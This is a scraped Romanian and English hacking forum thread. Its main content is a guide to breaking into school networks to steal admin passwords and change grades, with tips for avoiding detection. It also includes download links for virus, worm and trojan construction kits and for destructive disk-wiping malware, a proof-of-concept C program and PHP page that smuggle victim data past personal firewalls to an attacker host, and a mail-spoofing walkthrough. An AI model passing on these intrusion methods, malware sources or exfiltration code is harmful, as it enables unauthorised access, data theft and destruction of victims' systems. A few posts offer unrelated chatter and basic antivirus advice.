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corect big,dar si http://rapidshare.de/files/23804845/snagit.rar e bun oricum sunt amandoua bune,parerea mea
Nup Shoker...softice e inclus in hackers tools kit suite 2006 si merge si pe xp
Section 1: Accessing the Shared Network Computer class (if you have one) is of course a good place to start. Your computer class will undoubtedly use a windows operating system (not saying this is always the case, but usually...) so let's start from there. Usually these computers have two rights, user and administrator rights. So our first goal here is to jump from user(the privileges you currently have) to administrator privileges. If the operating system is Windows 9.x then we will look for the *.pwl file for the administrator account. This will be labeled according to the admin username. You'll find this in the windows directory. Just sneak in a floppy disk during class and copy the file to the floppy. Then take the file home and use a pwl cracker to crack the file (if you use brute force, make the settings lower case letters with 1-10 characters, but I'd suggest first trying a dictionary crack. Just collect yourself a few word lists). It'll take a while to crack the password so you will have to be patient. If the operating system is Windows XP then that just makes it even easier. Just grab a Windows 2k CD (download one off kazaa or overnet, if you don't have a copy) and sneak it into class. Place the CD in and boot up the computer.Then start the Win2k Recovery Console, which is a troubleshooting program. This will allow you to operate as administrator without even having to bother with the password. So now that you have administrator privileges go to "Network Neighborhood" and take a look through the network. Copy a few addresses (anything that seems interesting), and if the computers used are Win9.x, when you go home you can load up your internet browser and type "file://[target address]" to gain access. This is network access, but not the kind that will allow you to change your grades (unless the software the teachers use for accessing/modifying/deleting student records happens to be installed on the computer, and the password just conveniently happens to be the same password that the teacher uses on the windows administration account....which is not entirely far fetched). If the computer you are using is Win2k (Windows 2000) then you can try going to the site below to get a tool to crack the account.... http://www.lostpassword.com/windows-xp-2000-nt.htm (which also works for nt and xp) p.s: If you don't have a computer class, then you can try the computers at the library. Section 2: Network Exploitation Now let's talk network operating systems (NOSs). If your school uses Windows workgroups as a NOS, then the method described above would be your method in. Most likely, if the NOS is not windows workgroups, then it is Novell Netware. So now lets get into novell. Novell Netware is a server-based operating system for networks. Novell runs off a version of DOS called dr-dos (also known as Caldera DOS, since it was created by Caldera Systems Inc). It also runs off a protocol called IPX/SPX (Internetwork Packet eXchange/Sequenced Packet eXchange), which is very TCP/IP compatible (the later versions of novell run off a protocol based off ipx/spx known as NCP, Netware Core Protocol). Now in novell netware there are four different kind of rights given. There is user which gives access to //public and some other basic files. There is superuser, which is the access given to teachers. With this access they can view and delete student accounts whenever neccessary, but they can not delete, create, or change accounts. There is supervisor, which is the access administrators give themselves to work off of. And finally there is console, which is the highest rights one could gain on a novell network. Now since there have already been many articles written on novell network infiltration (and I'm in a lazy mood) I am now going to point you in the direction of articles that I had posted up from a previous article on a very similar subject (exactly the same subject actually, but targetted at a specific school network)... Novell Netware v1.x-4.x: http://www.geocities.com/anti_dcss/novell_faq.zip Novell Netware v3.12-4.x: http://www.geocities.com/anti_dcss/novzero.zip Novell Netware v5.x: http://www.geocities.com/anti_dcss/hack_novell.zip There is also AppleTalk, which may be implemented in order to integrate the Macintosh computers with the rest of the network, but it isn't really neccessary to exploit AppleTalk so I won't get into it. Now let's get into exploiting the network from the outside. If your school has a website, resolve the ip of the site and scan the network for other servers (i.e. open up a scanner and scan xxx.xxx.xxx.1-xxx.xxx.xxx.254). Use LANguard if you are running windows. The router will usually be *.1. Now if you scan this you will find either/both telnet (23) or snmp (161). If telnet is open then you can exploit the fact that all telnet sessions are unencrypted by using a tool like either Juggernaut or Hunt to hijack a session to sniff out sensitive information (like passwords of course). SNMP is protected by community strings, but in many cases these are set as default, which is "private". If not you can use a community string brute force program (for example SolarWinds) to break into the router. Once inside the router, you can easily use the access to bridge into the rest of the network. There will also be other servers you can try gaining access to bridge into the network. Web servers (port 80) are not important(unless you want to deface them), but ftp and pop3 servers can be cracked and used to bridge into the network. For ftp servers you can run network scanners to find vulnerabilities, and for pop3 servers you can look up scripts and see what might work (depends on the operating system the server is installed on). You need to organize the way you proceed with this crack however. Don't find and exploit vulnerabilities in the same night. Spread it out. Follow these three steps...Research, Plan, and Execute. This is no one day job. You need to be very patient or you will be caught. You also need to do this as late as possible (two or three o' clock in the morning is usually a safe time). Also you will want to bounce off proxies as much as possible. Better yet, for the tools you don't either have to compile or install, run them from the current location instead of off your computer. Most of the other tools needed should allow you to bounce off proxies/wingates. Remember, whether you are breaking in from the outside or the inside, to be cautious. Being paranoid is not a bad thing. After all, what you are doing IS against the law. Good luck . Another Thing: If the teachers at your school use a program called TSIS to manage student records, then usually there will also be a TSIS remote login server on the network. Using a scanner you should be able to pick up on this. The address is usually... http://tsis.(county name).k12.(state initials).us If you happen to crack one of the teacher accounts, you can use this to change your grades from the comfort of your own home (not that I'm supporting such activities . Note: If you have any questions or comments and feel the need to reach me then you can do so at i_azazel_i@yahoo.com and I will try to get back with you as soon as possible. Bafta!
Links: * http://www.hnc3k.com/filez/W32Dasm%20v8.9.zip -W32Dasm v8.9 = W32Dasm is a powerful windows 32 bits disassembler. * http://www.hnc3k.com/filez/HIEW%20v6.70.zip - HIEW v6.70 = HIEW (Hackers vIEW) is a good and easy to use hex / text editor. It also has a "decode" function which helps to view the code of the program in assambler. * http://www.hnc3k.com/filez/Adump%20v1.0.zip -Adump v1.0 = Dumper. * http://www.hnc3k.com/filez/Patchengine.zip -Patch Engine v1.32 = Creates standalone-patches. * http://www.hnc3k.com/filez/FrogsICE%20v0.31.ZIP -FrogsICE is a VxD (Virtual device driver for Windows). It allows you to intercept programs which would try to detect if SoftICE is loaded. It is particularly useful for packed / encrypted programs. FrogsICE runs ONLY on Win95/98 OS. Cam atat cu link,pt astea de mai jos cauta pe google : *SoftICE v4.05 *SmartCheck v6.03 *Windows ME Debugger Kit Bafta!
Links: * http://www.hnc3k.com/filez/cvcl.zip -Virus Creation Laboratory v1.0 = Belongs to those very popular virus creation programs. Nowhere Man's V.C.L. is a potentially dangerous program, and great care should be using when experimenting with *any* virii, trojans, or logic bombs produced by it. * http://www.hnc3k.com/filez/gv150.zip -Nuke GenVirus = Needs MS-DOS to work. * http://www.hnc3k.com/filez/IVP.ZIP -IVP = Requires MS-DOS v6.0 or higher. * http://www.hnc3k.com/filez/mvdk.zip -Macro Virus Development Kit v1.0b = Macro Virus Development Kit is a tool which generates macro viruses for Microsoft Winword, according to user specifications. * http://www.hnc3k.com/filez/nrlg.zip - NRLG - Nuke Randomic Life Generator v0.66b = Generates resident viruses. * http://www.hnc3k.com/filez/rme11.zip -Rajaat's Tiny Flexible Mutator v1.1 = RTFM is an object module that can be linked to your virus to make it impossible for a scanner to use a simple string. It will encrypt your virus and generates a random decryptor using random registers and random instructions. Therefore, an algorithmic approach will be needed to detect viruses using this object module. * http://www.hnc3k.com/filez/G2.ZIP -G2 Phalcon/Skism's = Requires MS-DOS v6.0 or higher. * http://www.hnc3k.com/filez/Thck200.zip -Trojan Horse Construction Kit v2.0 = Simple trojan horse toolkit. Requires MS-DOS v6.0 or higher. * http://www.hnc3k.com/filez/Vbswg%20v2%20BETA.zip -VBS Worm Generator v2.0 BETA = Powerful VB Script worm generator. - mai sunt cativa dar nu le merge link-ul cautati pe google : * Wave Func's Goofy Batch Virus Generator v1.1c * Virus Lab Creations v1.1 * Windows Virus Creation Kit v1.00 * Senna Spy Worm Generator 2000 * Virus Factory bafta!
You know how to make a web page there can resive variables? in php it's simple just do this: echo "String from victim: $blahblah"; ?> Name it "bypass_script.php" and point a url at: http://www.Your_Host.com/bypass_script.php...From_The_Victim (The_String_You_Whant_To_Get_From_The_Victim is ment to by replaced with some thing else, a bad person cud place a password and get it trough the firewall system!). Remember the max url length is 255 characters! Now you think that this all sounds good and easy, but how do you send the string from the victim? I have made a little C program with a Winapi buildt in it, cus the "ShellExecute" commands (API) job is to open any file with the default program (a webpage's default program is offen a webrowser Proof Of Concept Code: <---------------------------------Start On Source Code---------------------------------> // Made by: Truti - www.truti.com // Programmed on Visual C++ 6.0 - STD // Proof Of Concept Code for bypassing some personal firewalls // parameter for the [Program].exe [thing_you_want_to_open_on_the_victims_computer] // e.g. [Program].exe http://www.Your_Host.com/bypass_scr...... #include #include int WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR lpCmdLine, int nCmdShow) { HINSTANCE hInstance = ShellExecute(NULL, _T("open"), lpCmdLine, NULL, NULL, nCmdShow); return (NULL); } <----------------------------------End Of Source Code----------------------------------> You are not vulnerable if: You don't use a webbrowser for surfing on the web, or ZoneAlarm is set to stop even surf (i have never seen that!). (I can imagin that this trick works on manny other servers than just the tow mentioned, if you test it on otheres let me know! (main is on www.truti.com - (i change it in the next 2 weeks))) Links: shellexecute syntax: msdn.microsoft.com/library/en-us/shellcc/platform/ shell/reference/functions/shellexecute.asp http://www.zonelabs.com/ http://blackice.iss.net/ (I hate when header is missing) http://www.truti.com/headers/tchar.h http://www.truti.com/headers/windows.h
To delete a system password: 1. Use your system "find" feature to locate all .pwl files 2. Delete them. The system will then ask you to create a new password. Bafta! Sper ca e de folos
Y!M cel mai des utilizat, cum zice Hannibal pt noi e bun messangerul.Am tot primit mass-uri de la prieteni,ca,cica se va renunta la messanger pt ca e pe gratis.Dar nu cred. So... Y!M Rullz
FireFox cred ca e cel mai bun ,parerea mea...
FireCracker | = Acest program detecteaza automat un firewall (AT Guard, Zone Alarm, McAfee Firewall) dezactivand-ul si apoi stergand-ul de pe hard disk. Iconita firewall-ului ramane in taskbar astfel incat sa se creada ca totul este in regula. Acest program ruleaza pe urmatoarele sisteme de operare: Win9x/Me/NT/2000/XP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | DatKiller | = Sterge toate fisierele de tip data de pe hard disk. Acest program ruleaza pe urmatoarele sisteme de operare: Win9x/Me/NT/2000/XP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Fix For Bugregcon Vbs | = Un mic script care modifica registri Windows-ului facand-ul sa nu mai functioneze. Acest program ruleaza pe urmatoarele sisteme de operare: Win9x/Me/NT/2000/XP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Hard Drive Killer Pro 4 | = Cel mai de temut program. H.D.K. pro 4 a fost realizat pentru a distruge toate informatiile stocate pe hard disk formatand-ul. Odata executat acest program infecteaza sau sterge toate fisierele iar apoi restarteaza P.C-ul. Dupa restartare programul formateaza hard disk-ul in cateva secunde intr-un fel in care datele nu mai pot fi recuperate. Acest program, desi nu este realizat sa faca acest lucru, poate chiar sa si defecteze hard disk-ul. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | WinFuck | = Un mic fisier .bat realizat pentru a face multe lucruri malefice pe un P.C. care are instalat un sistem de operare Windows. El executa comenzi simple de dos care sunt menite sa distruga toate datele de pe hard disk iar apoi realizeaza un nr. mare de foldere distrugand in acest fel sistemul de operare. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Shareall | = Acest program activeaza functia file & print sharing pentru fiecare partitie dintr-un computer. Singurul defect al acestui program este ca restarteaza computerul pe care este utilizat. ATENTIE !!! Acest program este un fel de troian asa ca nu trebuie sa-l rulati pe sistemul vostru. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Aenima 2 | = Unul dintre cele mai populare si eficace mail bombers. Este foarte bun si rapid, fiecare versiune avand incluse instructiuni si tehnici eficiente. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Ghost Mail | = Ghost Mail iti ofera posibilitatea de a trimite mesaje anonime catre o adresa de e-mail. Utilizati acest program pentru a trimite e-mailuri anonime si nedetectabile Links: * http://hsupload.go.ro/windows/Firecracker.zip -firecracker * http://hsupload.go.ro/windows/GM32.zip - ghost mail * http://www.geocities.com/siliconvalley/ ... nload.html -aenima mail bomber and other ... * http://hsupload.go.ro/windows/aenima .EXE -aenima * http://www.antiserver.it/Trojans-Archive/index.html -site de unde se pot lua multe * http://hsupload.go.ro/windows/Share All.zip -shareall * http://hsupload.go.ro/windows/Trojan.Win32.WinFuck.zip -winfuck * http://www.mininova.org/tor/166609 - .iso = Hard Drive Killer Pro v4.0 + Hard Drive Killer Pro v5.0b * http://www.packetstormsecurity.org/Win/ind...ndexsize13.html - another gooood site * http://hsupload.go.ro/windows/buGregCon-hotfix.EXE - buGregCon VBS * http://www.trojaner-info.de/evil.shtml -datkiller * http://groups.msn.com/THENIGHTMAREPAGE/tro...royanos.msnw-pt -datkiller Bafta!
Global Deejays - Stars On The 45(Network Mix)
Exista o singura metoda dovedita care se poate folosi impotriva unui virus, niciodata sa nu pornesti un program ce nu se afla deja pe calculatorul tau si sa nu folosesti niciodata CD-ul altcuiva. Din pacate acest lucru inca se practica asa ca, urmatoarele lucruri ce merg folosite sunt: * Backups ?? realizeaza backup-uri frecvente fisierelor de pe harddisk. Adu-ti aminte ca la un moment dat vei putea pierde intreg continutul harddisk-ului. Ai facut backup-uri tuturor fisierelor tale importante? Lucruri precum parolele si numerele de telefoane dintr-o agenda electronica sunt cele mai greu de recuperat. Asadar fi pregatit pentru ce e mai rau. * Rescue Disk multe programe precum TBAV si Norton Utilities i-ti va permite sa creezi un rescue disk?, ce este de fapt o discheta floppy cu care poti sa bootezi in cazul unei urgente. Aceasta discheta va contine o copie importanta a informatiei sistemului cum ar fi: partition table, Master Boot Table (MBR), setarile CMOS, si alte informatii importante. Tot pe acest disc, ar trebui sa stochezi utilitare ce pot fi folosite in identificarea, curatarea si stergerea virusilor din harddisk. Aceasta discheta ar trebui sa fie write-protected, si updatata de fiecare data cand faci schimbari in sistem. * Software Anti-Virus ?? Exista o sumedenie de programe anti-virus disponibile pe piata electronica. In general cele mai bune sunt shareware dar exista si cateva freeware. Totusi trebuie sa aveti grija ce software folositi in lupta contra virusilor deoarece unele nu sunt foarte eficiente. *Informarea ?? Incearca sa te informezi despre felul in care actioneaza virusii, afla ce virusi noi au aparut si modul in care te poti apara de ei. Majoritatea utilizatorilor de computere ignora informatiile referitoare la modul de actionare a unui virus. Citind acest articol tocmai ai facut un mare pas in protectia computerului tau la atacul virusilor.
| SubSeven | = Unul dintre cei mai renumiti troieni. Acest program controleaza aproape in totalitate computerul victimelor. Printre dotarile lui suplimentare se gasesc un IP Scanner si o agenda unde se pot tine IP-urile victimelor. Acest program ruleaza pe urmatoarele sisteme de operare: Win9x/Me/NT/2000/XP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | UnDetected | = Undetected este un troian ce incepe sa fie cunoscut drept cel mai complet program de acest gen disponibil pe scara larga. Acest program ruleaza pe urmatoarele sisteme de operare: Win9x/Me/NT/2000/XP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Infector | = Acest troian ofera acces la multiple operatii cum ar fi: upload/download, show/hide image, desktop preview, shut down/log off/reboot/power off, open browser, open/close cd rom, webcam and tv card view etc. Acest program ruleaza pe urmatoarele sisteme de operare: Win9x/Me/NT/2000/XP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | BioNet | = BioNet este un troian unic considerat a fi deschizator de drumuri prin facilitatile oferite. Este cu mult superior altor astfel de programe deoarece codul sau sursa este scris de la zero fara a exista asemanari cu alte programe. Una dintre cele mai importante facilitati o reprezinta metoda de compresare a fisierelor ce pot fi descarcate de pe computerul victimei, datorita unui algoritm de compresare superior ce este cu pana la 98% mai eficace. Acest program ruleaza pe urmatoarele sisteme de operare: Win9x/Me/NT/2000/XP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Asylum | = Un alt troian folositor datorita interfetei sale prietenoase. Acest program ruleaza pe urmatoarele sisteme de operare: Win9x/Me/NT/2000/XP
In primul rand incep prin a va preciza ca incepem mai intai sa ne dam seama cum stam cu utilitatile disponibile privind protocolurile TCP/IP . Presupun ca sunteti familiarizati sau macar ati auzit de asa ceva TCP/IP Protocols . Mai intai o sa va relatez cateva din bazele acesturi seturi de protocol . Asadar , protocol = niste reguli de comunicare intre niste sisteme dintr-o retea . Tcp/ip sunt cele mai cunoscute si folosite protocoale pe sistem windows petru comunicatii pe internet . Tcp/ip cuprinde multe utilitati ,unele sunt utilitati de comenzi ,altele de transfer ,si altele sunt chiar utilitati de printare . Utilitati de Comenzi : REXEC ( Remote Execution) , RSH ( Remote Shell) si Telnet Utilitati de transfer : FTP ,RCP , TFTP Utilitati de printare : LPR , LPQ Insa dintre aceste utilitati ale TCP/IP ( Transmission Cotrol Protocol/ Internet Protocol) ma voi axa pe Telnet caci doar despre asta este vorba Ce este Telnet-ul ? Practic telnet, stiut si ca "terminal emulator" este un software consola care ii da posibilitatea unui user de a folosi resursele unui alt sistem prin conectarea cu acesta folosind o adresa ip si un shell valid pe sistemul tinta . Mai simplu , telnetul lucreaza ca un fel de troian ; Utilizand un client Telnet , un utilizator se conecteaza la un server telnet de pe un anumit server pe un anumit port .Portul default e 23 dar poate fi si altul , totul depinzand de sistemul tinta si porturile deschise ale acestuia . Asadar, cam asta este de spus in ceea ce priveste sensul si explicatiile de baza ; Acum ,ma gandesc eu ca ar cam trebui sa va spun despre Telnet mai mult in ceea ce priveste partea cu hacking-ul Pentru a deschide un client telnet , foarte simplu poti intra in Run si tastand : telnet. In general pe win 95/98/Me un window telnet va aparea , dar in windows xp, windows 2000 va aparea o consola dos . Pentru a rula Telnet in consola dos pe win 98/95/ME trebuie doar sa copy codul de mai jos si sa-l salvezi ex: i_wanna_be_a_hacker.reg ulterior sa-l executi . Codul este : REGEDIT 4 [HKEY_USERSS-1-5-21-1229272821-1563985344-1060284298-1003SoftwareMicrosoft Telnet]"MODE"="CONSOLE" Ce pot sa fac cu Telnet ? In general hackerii incearca sa se conecteze la daemon( Un program UNIX ce ruleaza neincetat in background, pana cand este activat de catre un eveniment particular. Acest cuvant este adesea folosit ca referire la programele ce se ocupa de e-mail. Cuvantul daemon inseamna in limba Greaca "o putere sau spirit insotitor". ) pe un port deschis al unui sistem tinta incercand sa obtina drept administrator/root pe acel sistem. In cazul in care vrei sa incerci sa spargi un astfel de sistem tinta prin aceasta metoda , mai intai va trebui sa scanezi acest sistem sa vezi ce porturi deschise sunt pe el , si pentru aceasta ai nevoie de un scaner performat ( Vezi sectiunea Windows-Hacking/Port Scanning ) , ulterior dupa detectarea portului deschis sa te conectezi prin telnet . De exemplu ,mai demult am scanat pe porturi un server de web a unui prieten de-al meu si am gasit port 25 deschis cu tot cu SMTP daemon ruland ( SMTP - mail transfer, un protocol ). Ce am facut , am accesat Telnet , m-am conectat la server pe port 25 si folosind protocul lui SMTP am trimis mai multe mail-uri anonime mai multor prieteni, ca a doua zi sa-i spun ca i-am folosit serverul de web fara autorizare exemplu : C:telnet Welcome To Microsoft Telnet client Escape Character is 'CTRL+]' Microsoft Telnet>open webmail.nebunu.org 25 Connecting to webmail.nebunu.org.... Connected.. . . . ok ,acum ce fac , avand SMTP disponibil, m-am jucat oleak' cu el , apropo, daca nu esti familiarizat cu comenzile Telnet trebuie doar sa tastezi HELP dupa ce te-ai conectat si ti se va afisa o lista cu toate comenzile care sunt disponibile pe acel server. Oricum,sa va arat cum am trimis mail-urilea alea de pe serverul lui folosind comenzile de baza pe care oricare ESMTP server le are ( ESMTP = Extended Simple Mail Transfer Protocol) : Incepem : Telnet>open webmail.nebunu.org 25 Connecting... Connected to webmail.nebunu.org 220 Welcome to webmail.nebunu.org ESMTP service 8.9.3 HEllo Florin 220 Welcome to sendmail Florin MAIL FROM:florin @mailfals.org 240 Sender set to florin @mailfals.org RCPT TO:me @nebunu.org 240 Recipient set to me @nebunu.org DATA 220 End with " . " Subject: Salut Florin Ciao pal , ce dreq mai faci , uite eu tocmai iti trimit un mail fals folosind Web serverul tau , nu o lua la personal / ai grija sa-ti securizezi ESMTP-ul , hai bafta . 240 CA55910 Message accepted for delivery .. P.s: va ganditi ce inseamna valorile alea 240,220 sau ca55910 .. Nu va ganditi prea mult , acele valori sunt doar coduri la mesaje ale serverului. De exemplu : serverul va raspunde cu 220 pentru afisarea unui banner aici ,deci toate banerele vor aparea cu codul 220, serverul va afisa acceptarea cu 240 aici ...etc ,nu-s importante . si despre CA55910 , e doar MSGID sau Message ID , in logurile serverului se inregistreaza cu acest Id mailul pe care tocmai l-ai trimis . | Bingo ! Am Trimis un mail fals ! Sunt un hacker ! yesss !! Hmm' , nu e bine de gandit asa , pentru ca trimitand un mail fals nu te face hacker. ci mai degraba nu are nimic in comun cu hackingul real . Mailurile false / Mail Spoofing pot fi foarte usor detectate si Isp-ul tau ( isp=internet service provider) poate fi aflat usor . Si daca victima trimite un mail la abuse @isp.net si face plangeri despre activitatea ta atunci , imi pare rau dar iti poti pierde contractul cu acel isp ; oricum ai putea sa-ti trimiti niste mailuri false tie ca sa te obisnuiesti cu Telnetul . Baieti ,inca nu fiti prea entuziasmati privind hackingul cu ajutorul telnetului pentru ca lucrurile nu stau asa de usor precum par . Am trimis eu un mail fals prin webmail.nebunu.org folosindu-i serverul ESMTP dar nu am obtinut drept de administrator/root . Anyway, sunt multe chestii cu care poti sa te "joci" folosind telnetul. spre Exemplu poti executa o sesiune raw pe IRC folosind telnet-ul . Presupun ca sunteti familiarizati cu IRC-ul ( Internet Relay Chat ) . Cand te conectezi pe un server IRC te va autentifica dupa username si host adress si iti cere un nick . De regula pe software mIRC aceste informatii sunt date de catre program insusi( mai putin nickul care-l scri) , dar daca te conectezi folosind Telnet aceste variabile va trebui sa le introduci tu manual . P.s:Anumite servere nu suporta sesiuni raw IRC caci sunt un pic nesigure ; DEschizi Telnet si te conectezi altfel : Telnet> open irc.servername.net 667 (ex : open bucharest.ro.eu.undernet.org 6667) - ( de regula se foloseste portul 6667 ca e folosit de toate servele ) nick - introduci nickul user - introduci hostul tau acum fiind conectat poti folosi comenzile de pe mIRC dar fara / , de ex pt a trimite un mesaj privat cuiva trebuie doar sa faci urmatoarele : PRIVMSG NICK MESSAGE : // Bafta!
LOOOOL Shoker , am crezut ca nu se mai termina ! dar mersi man
Da mc1 , e veche faza , bine ca ai postat poate sunt altii care nu stiau de ea.Dar cine stie cum sa suni pe un tip cu alt numar ??? sau la sms e accesi faza , tipului ii apare alt numar ?
Multumesc Zbeng !!!
Cel mai simplu Copy & Paste , parerea mea :nu cred ca trebuie sa te complici cu cmd,command.
Pytbullu cunosti pe unu Talent din Galati?
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Tinand cont de ce scrie la Tutoriale:"Tutoriale in limba romana cat si engleza" What are tutorials/tuts? They are user written guides for anything. They are much better than a help file because they give good answers to common questions. They show you what you want to know, not everything. Why are you talking about this? Ever since the dawn of time there has been the nothing. I've seen many tutorials of which suck balls. I am writing this to help those people, and to maybe give something more to the people who are already good at it. I am grateful for all the people that write tutorials, and the ones who write them good get a cookie. Those ones are the ones that show what you downloaded/viewed that tutorial to know. These are the ones who tell you what you care about, and who explain it. You know who you are . What can it be about? ANYTHING! Most people here want security though. - Flash - Premiere - Photoshop - Security (hacking) - DVD Authoring - DVD Burning - Tweaks - Music - Fruity Loops - PHP - ASP - MySQL - XMB - Apache - Linux Anything! How do I write a tutorial? Well there are several main factors to doing this... You need to be interesting Dont put your readers into boredom by stating the fact. Interest them, screenshots, examples, be freindly. Write it naturally. You need an example This is much liked in a tutorial. An example. People like to see the process of what you are writing about. It helps them better understand it. I wrote a tutorial on flash animating DVD Buttons, i have tons of screenies and reference to 'The Lord of The Rings' dvd menu. If you are writing on security, choose a victim! Make your own server to hack into. Make it good. The Facts Make sure you know what you are writing about. Do not lie. Do not talk about things you dont know about. Make sure you are giving it to them 'as it is' but in your own words. Copyright and Disclaimer Everything is nice when its copyrighted . Go light on this, let people use your words but make sure you tell them to give you credit. No one likes a plagarist. Disclaimer, if you are righting on security i strongly suggest this. Make sure you are stating what the risk of acting upon this knowledge is. Make sure they know the consequences. And tell them that you are not responsible for the abuse of this information (copyrights [dvd], hacking). Overall Give them something they can learn from. Teach them what they want to know. Help them. You will be a seeder of the world, you will spread the things you learn onto future generations to keep alive the topic you write about. The people who write these things are good people, willing to share their knowledge. You see them on irc, thank them, complement them. Thats all. Bafta
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